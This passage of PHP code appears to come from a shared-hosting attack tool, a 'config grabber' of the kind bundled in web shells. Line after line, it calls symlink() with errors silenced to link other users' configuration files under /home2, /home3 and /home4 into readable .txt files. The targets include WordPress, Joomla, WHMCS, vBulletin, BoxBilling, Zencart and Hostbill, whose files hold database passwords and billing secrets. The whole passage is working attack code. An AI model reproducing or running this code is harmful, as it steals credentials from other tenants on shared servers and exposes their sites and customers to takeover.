  1425. @symlink('/home2/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1426. @symlink('/home2/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1427. @symlink('/home2/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1428. @symlink('/home2/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1429. @symlink('/home2/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1430. @symlink('/home2/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1431. @symlink('/home2/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1432. @symlink('/home2/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1433. @symlink('/home2/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1434. @symlink('/home2/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1435. @symlink('/home2/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1436. @symlink('/home2/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1437. @symlink('/home2/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1438. @symlink('/home2/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1439. @symlink('/home2/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1440. @symlink('/home2/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1441. @symlink('/home2/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1442. @symlink('/home2/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1443. @symlink('/home2/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1444. @symlink('/home2/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1445. @symlink('/home2/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1446. @symlink('/home2/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1447. @symlink('/home2/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1448. @symlink('/home2/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1449. @symlink('/home2/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1450. @symlink('/home2/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1451. @symlink('/home2/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1452. @symlink('/home2/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1453. @symlink('/home2/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1454. @symlink('/home2/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1455. @symlink('/home2/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1456. @symlink('/home2/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1457. @symlink('/home2/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1458. @symlink('/home2/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1459. @symlink('/home2/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1460. @symlink('/home2/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1461. @symlink('/home2/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1462. @symlink('/home2/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1463. @symlink('/home2/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1464. @symlink('/home2/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1465. @symlink('/home2/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1466. @symlink('/home2/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1467. @symlink('/home2/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1468. @symlink('/home2/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1469. @symlink('/home2/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1470. @symlink('/home2/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1471. @symlink('/home2/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1472. @symlink('/home2/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1473. @symlink('/home2/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1474. @symlink('/home2/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1475. @symlink('/home2/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1476. @symlink('/home2/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1477. @symlink('/home2/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1478. @symlink('/home2/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1479. @symlink('/home2/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1480. @symlink('/home2/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1481. @symlink('/home2/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1482. @symlink('/home2/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1483. @symlink('/home2/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1484. @symlink('/home2/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1485. @symlink('/home2/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1486. @symlink('/home2/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1487. @symlink('/home2/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1488. @symlink('/home2/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1489. @symlink('/home2/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1490. @symlink('/home2/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1491. @symlink('/home2/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1492. @symlink('/home2/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1493. @symlink('/home2/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1494. @symlink('/home2/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1495. @symlink('/home2/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1496. @symlink('/home2/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1497. @symlink('/home2/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1498. @symlink('/home2/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1499. @symlink('/home2/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1500.  
  1501. //Home3
  1502.  
  1503. @symlink('/home3/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1504. @symlink('/home3/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1505. @symlink('/home3/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1506. @symlink('/home3/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1507. @symlink('/home3/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1508. @symlink('/home3/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1509. @symlink('/home3/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1510. @symlink('/home3/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1511. @symlink('/home3/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1512. @symlink('/home3/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1513. @symlink('/home3/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1514. @symlink('/home3/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1515. @symlink('/home3/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1516. @symlink('/home3/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1517. @symlink('/home3/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1518. @symlink('/home3/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1519. @symlink('/home3/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1520. @symlink('/home3/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1521. @symlink('/home3/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1522. @symlink('/home3/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1523. @symlink('/home3/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1524. @symlink('/home3/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1525. @symlink('/home3/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1526. @symlink('/home3/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1527. @symlink('/home3/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1528. @symlink('/home3/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1529. @symlink('/home3/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1530. @symlink('/home3/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1531. @symlink('/home3/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1532. @symlink('/home3/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1533. @symlink('/home3/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1534. @symlink('/home3/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1535. @symlink('/home3/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1536. @symlink('/home3/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1537. @symlink('/home3/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1538. @symlink('/home3/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1539. @symlink('/home3/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1540. @symlink('/home3/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1541. @symlink('/home3/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1542. @symlink('/home3/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1543. @symlink('/home3/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1544. @symlink('/home3/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1545. @symlink('/home3/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1546. @symlink('/home3/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1547. @symlink('/home3/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1548. @symlink('/home3/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1549. @symlink('/home3/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  1550. @symlink('/home3/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  1551. @symlink('/home3/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  1552. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1553. @symlink('/home3/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  1554. @symlink('/home3/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  1555. @symlink('/home3/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  1556. @symlink('/home3/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  1557. @symlink('/home3/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  1558. @symlink('/home3/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  1559. @symlink('/home3/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  1560. @symlink('/home3/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  1561. @symlink('/home3/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  1562. @symlink('/home3/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  1563. @symlink('/home3/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  1564. @symlink('/home3/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  1565. @symlink('/home3/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  1566. @symlink('/home3/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  1567. @symlink('/home3/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  1568. @symlink('/home3/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  1569. @symlink('/home3/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  1570. @symlink('/home3/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  1571. @symlink('/home3/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  1572. @symlink('/home3/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  1573. @symlink('/home3/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  1574. @symlink('/home3/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  1575. @symlink('/home3/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  1576. @symlink('/home3/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  1577. @symlink('/home3/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  1578. @symlink('/home3/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  1579. @symlink('/home3/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  1580. @symlink('/home3/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  1581. @symlink('/home3/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  1582. @symlink('/home3/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  1583. @symlink('/home3/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  1584. @symlink('/home3/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  1585. @symlink('/home3/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  1586. @symlink('/home3/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  1587. @symlink('/home3/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  1588. @symlink('/home3/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  1589. @symlink('/home3/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  1590. @symlink('/home3/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  1591. @symlink('/home3/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  1592. @symlink('/home3/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  1593. @symlink('/home3/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  1594. @symlink('/home3/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  1595. @symlink('/home3/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  1596. @symlink('/home3/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  1597. @symlink('/home3/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  1598. @symlink('/home3/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1599. @symlink('/home3/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1600. @symlink('/home3/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1601. @symlink('/home3/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1602. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1603. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1604. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1605. @symlink('/home3/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1606. @symlink('/home3/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1607. @symlink('/home3/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1608. @symlink('/home3/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1609. @symlink('/home3/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1610. @symlink('/home3/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1611. @symlink('/home3/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1612. @symlink('/home3/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1613. @symlink('/home3/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1614. @symlink('/home3/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1615. @symlink('/home3/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1616. @symlink('/home3/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1617. @symlink('/home3/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1618. @symlink('/home3/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1619. @symlink('/home3/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1620. @symlink('/home3/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1621. @symlink('/home3/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1622. @symlink('/home3/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1623. @symlink('/home3/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1624. @symlink('/home3/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1625. @symlink('/home3/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1626. @symlink('/home3/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1627. @symlink('/home3/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1628. @symlink('/home3/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1629. @symlink('/home3/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1630. @symlink('/home3/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1631. @symlink('/home3/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1632. @symlink('/home3/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1633. @symlink('/home3/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1634. @symlink('/home3/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1635. @symlink('/home3/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1636. @symlink('/home3/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1637. @symlink('/home3/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1638. @symlink('/home3/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1639. @symlink('/home3/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1640. @symlink('/home3/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1641. @symlink('/home3/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1642. @symlink('/home3/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1643. @symlink('/home3/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1644. @symlink('/home3/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1645. @symlink('/home3/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1646. @symlink('/home3/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1647. @symlink('/home3/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1648. @symlink('/home3/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1649. @symlink('/home3/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1650. @symlink('/home3/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1651. @symlink('/home3/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1652. @symlink('/home3/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1653. @symlink('/home3/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1654. @symlink('/home3/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1655. @symlink('/home3/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  1656. @symlink('/home3/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  1657. @symlink('/home3/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  1658. @symlink('/home3/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  1659. @symlink('/home3/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  1660. @symlink('/home3/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  1661. @symlink('/home3/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  1662. @symlink('/home3/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  1663. @symlink('/home3/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  1664. @symlink('/home3/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  1665. @symlink('/home3/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  1666. @symlink('/home3/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  1667. @symlink('/home3/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  1668. @symlink('/home3/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  1669. @symlink('/home3/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  1670. @symlink('/home3/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  1671. @symlink('/home3/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  1672. @symlink('/home3/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  1673. @symlink('/home3/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1674. @symlink('/home3/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  1675. @symlink('/home3/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  1676. @symlink('/home3/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  1677. @symlink('/home3/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  1678. @symlink('/home3/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  1679. @symlink('/home3/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  1680. @symlink('/home3/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  1681. @symlink('/home3/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  1682. @symlink('/home3/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  1683.  
  1684. //Home4
  1685.  
  1686. @symlink('/home4/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  1687. @symlink('/home4/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  1688. @symlink('/home4/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  1689. @symlink('/home4/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  1690. @symlink('/home4/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  1691. @symlink('/home4/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  1692. @symlink('/home4/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  1693. @symlink('/home4/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  1694. @symlink('/home4/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  1695. @symlink('/home4/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  1696. @symlink('/home4/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  1697. @symlink('/home4/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  1698. @symlink('/home4/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  1699. @symlink('/home4/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  1700. @symlink('/home4/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  1701. @symlink('/home4/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  1702. @symlink('/home4/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  1703. @symlink('/home4/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  1704. @symlink('/home4/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  1705. @symlink('/home4/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  1706. @symlink('/home4/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  1707. @symlink('/home4/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  1708. @symlink('/home4/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  1709. @symlink('/home4/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  1710. @symlink('/home4/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  1711. @symlink('/home4/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  1712. @symlink('/home4/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  1713. @symlink('/home4/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  1714. @symlink('/home4/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  1715. @symlink('/home4/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  1716. @symlink('/home4/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  1717. @symlink('/home4/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  1718. @symlink('/home4/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  1719. @symlink('/home4/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  1720. @symlink('/home4/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  1721. @symlink('/home4/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  1722. @symlink('/home4/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  1723. @symlink('/home4/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  1724. @symlink('/home4/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  1725. @symlink('/home4/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  1726. @symlink('/home4/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  1727. @symlink('/home4/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  1728. @symlink('/home4/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  1729. @symlink('/home4/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  1730. @symlink('/home4/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  1731. @symlink('/home4/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  1732. @symlink('/home4/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
